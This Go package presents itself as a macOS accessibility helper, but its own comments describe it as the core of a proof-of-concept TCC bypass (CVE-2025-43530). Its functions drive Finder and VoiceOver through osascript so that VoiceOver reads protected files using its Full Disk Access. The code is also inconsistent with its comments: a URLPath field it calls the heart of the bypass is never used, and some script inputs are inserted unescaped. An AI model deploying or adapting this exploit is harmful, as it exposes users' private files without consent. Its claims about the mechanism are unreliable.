// Package ax provides utilities for interacting with the macOS Accessibility
// (AX) API via AppleScript and osascript, without CGo.
//
// Common uses:
//   - Forging AXUIElements to inject into VoiceOver / assistive daemons
//   - Reading kAXDescriptionAttribute from any on-screen element
//   - Posting AX notifications to privileged processes
//
// Usage:
//
//	import "mackit/ax"
//
//	desc, err := ax.GetDescription("/Users/alice/Documents")
//	err = ax.PostFocusChanged("Finder", "/Users/alice/Documents")
//	attrs, err := ax.GetAttributes("Safari", "document 1")
package ax

import (
	"fmt"
	"os/exec"
	"strings"
	"time"
)

// ─── Types ───────────────────────────────────────────────────────────────────

// Attribute names mirror the kAX* constants from the AX API.
const (
	AttrDescription = "AXDescription"
	AttrURL         = "AXURL"
	AttrValue       = "AXValue"
	AttrTitle       = "AXTitle"
	AttrRole        = "AXRole"
	AttrHelp        = "AXHelp"
	AttrFilename    = "AXFilename"
)

// Element represents a target AX element identified by application and
// optional element qualifier.
type Element struct {
	// App is the target application name (as seen by System Events).
	App string

	// Qualifier selects an element within the app, e.g. "document 1",
	// "window 1", "menu bar 1".  Empty means the app's main window.
	Qualifier string

	// URLPath, if set, is injected as the kAXURLAttribute of a forged element.
	// This is the core of the VoiceOver-style TCC bypass (CVE-2025-43530).
	URLPath string
}

// ─── GetDescription ──────────────────────────────────────────────────────────

// GetDescription asks VoiceOver to return its spoken description for the given
// file path by injecting a forged AXUIElement via the Finder selection.
//
// On vulnerable macOS versions (< 14.8.3 / 15.7.3 / 26.2) this returns the
// AX description that VoiceOverSystem generated by opening the file with its
// own Full-Disk Access credentials — bypassing TCC for the caller.
func GetDescription(filePath string) (string, error) {
	safe := escapeAppleScript(filePath)
	script := fmt.Sprintf(`
set targetFile to POSIX file "%s"

tell application "Finder"
    try
        set selection to {targetFile as alias}
    end try
end tell

delay 0.4

tell application "VoiceOver"
    try
        set desc to content of window 1
        return desc
    on error msg
        return "ax_error:" & msg
    end try
end tell
`, safe)

	out, err := runScript(script, 5*time.Second)
	if err != nil {
		return "", fmt.Errorf("GetDescription %s: %w", filePath, err)
	}
	return strings.TrimSpace(out), nil
}

// ─── GetAttribute ─────────────────────────────────────────────────────────────

// GetAttribute reads a named AX attribute from an element in the target app.
func GetAttribute(el Element, attr string) (string, error) {
	qualifier := el.Qualifier
	if qualifier == "" {
		qualifier = "window 1"
	}
	script := fmt.Sprintf(`
tell application "System Events"
    tell process "%s"
        try
            return value of attribute "%s" of %s
        on error msg
            return "ax_error:" & msg
        end try
    end tell
end tell
`, escapeAppleScript(el.App), attr, qualifier)

	out, err := runScript(script, 5*time.Second)
	if err != nil {
		return "", fmt.Errorf("GetAttribute %s.%s: %w", el.App, attr, err)
	}
	return strings.TrimSpace(out), nil
}

// ─── PostFocusChanged ────────────────────────────────────────────────────────

// PostFocusChanged forges a kAXFocusedUIElementChangedNotification for the
// given application, with URLPath set on the focused element.
//
// This is the core injection primitive used by the CVE-2025-43530 PoC.
func PostFocusChanged(app, urlPath string) error {
	safe := escapeAppleScript(urlPath)
	script := fmt.Sprintf(`
set targetFile to POSIX file "%s"

tell application "%s"
    try
        activate
    end try
end tell

tell application "System Events"
    tell process "%s"
        try
            set frontmost to true
        end try
    end tell
end tell

tell application "Finder"
    try
        set selection to {targetFile as alias}
    end try
end tell
`, safe, escapeAppleScript(app), escapeAppleScript(app))

	_, err := runScript(script, 5*time.Second)
	return err
}

// ─── ListChildren ────────────────────────────────────────────────────────────

// ListChildren returns the AX children of an element as a slice of role|title strings.
func ListChildren(el Element) ([]string, error) {
	qualifier := el.Qualifier
	if qualifier == "" {
		qualifier = "window 1"
	}
	script := fmt.Sprintf(`
set output to ""
tell application "System Events"
    tell process "%s"
        set kids to UI elements of %s
        repeat with kid in kids
            try
                set r to role of kid
                set t to title of kid
                set output to output & r & "|" & t & "\n"
            end try
        end repeat
    end tell
end tell
return output
`, escapeAppleScript(el.App), qualifier)

	out, err := runScript(script, 8*time.Second)
	if err != nil {
		return nil, fmt.Errorf("ListChildren: %w", err)
	}

	var result []string
	for _, line := range strings.Split(strings.TrimSpace(out), "\n") {
		if line != "" {
			result = append(result, line)
		}
	}
	return result, nil
}

// ─── IsEnabled ───────────────────────────────────────────────────────────────

// IsAccessibilityEnabled returns true if the current process (or the user
// session) has Accessibility permission enabled.
func IsAccessibilityEnabled() bool {
	out, err := exec.Command("osascript", "-e",
		`tell application "System Events" to return enabled of accessibility shortcut`).Output()
	if err != nil {
		return false
	}
	return strings.Contains(strings.ToLower(string(out)), "true")
}

// ─── helpers ─────────────────────────────────────────────────────────────────

func runScript(script string, timeout time.Duration) (string, error) {
	cmd := exec.Command("osascript", "-e", script)
	done := make(chan struct {
		out []byte
		err error
	}, 1)

	go func() {
		out, err := cmd.CombinedOutput()
		done <- struct {
			out []byte
			err error
		}{out, err}
	}()

	select {
	case r := <-done:
		return string(r.out), r.err
	case <-time.After(timeout):
		_ = cmd.Process.Kill()
		return "", fmt.Errorf("osascript timeout after %v", timeout)
	}
}

// escapeAppleScript escapes double-quotes inside an AppleScript string literal.
func escapeAppleScript(s string) string {
	return strings.ReplaceAll(s, `"`, `\"`)
}
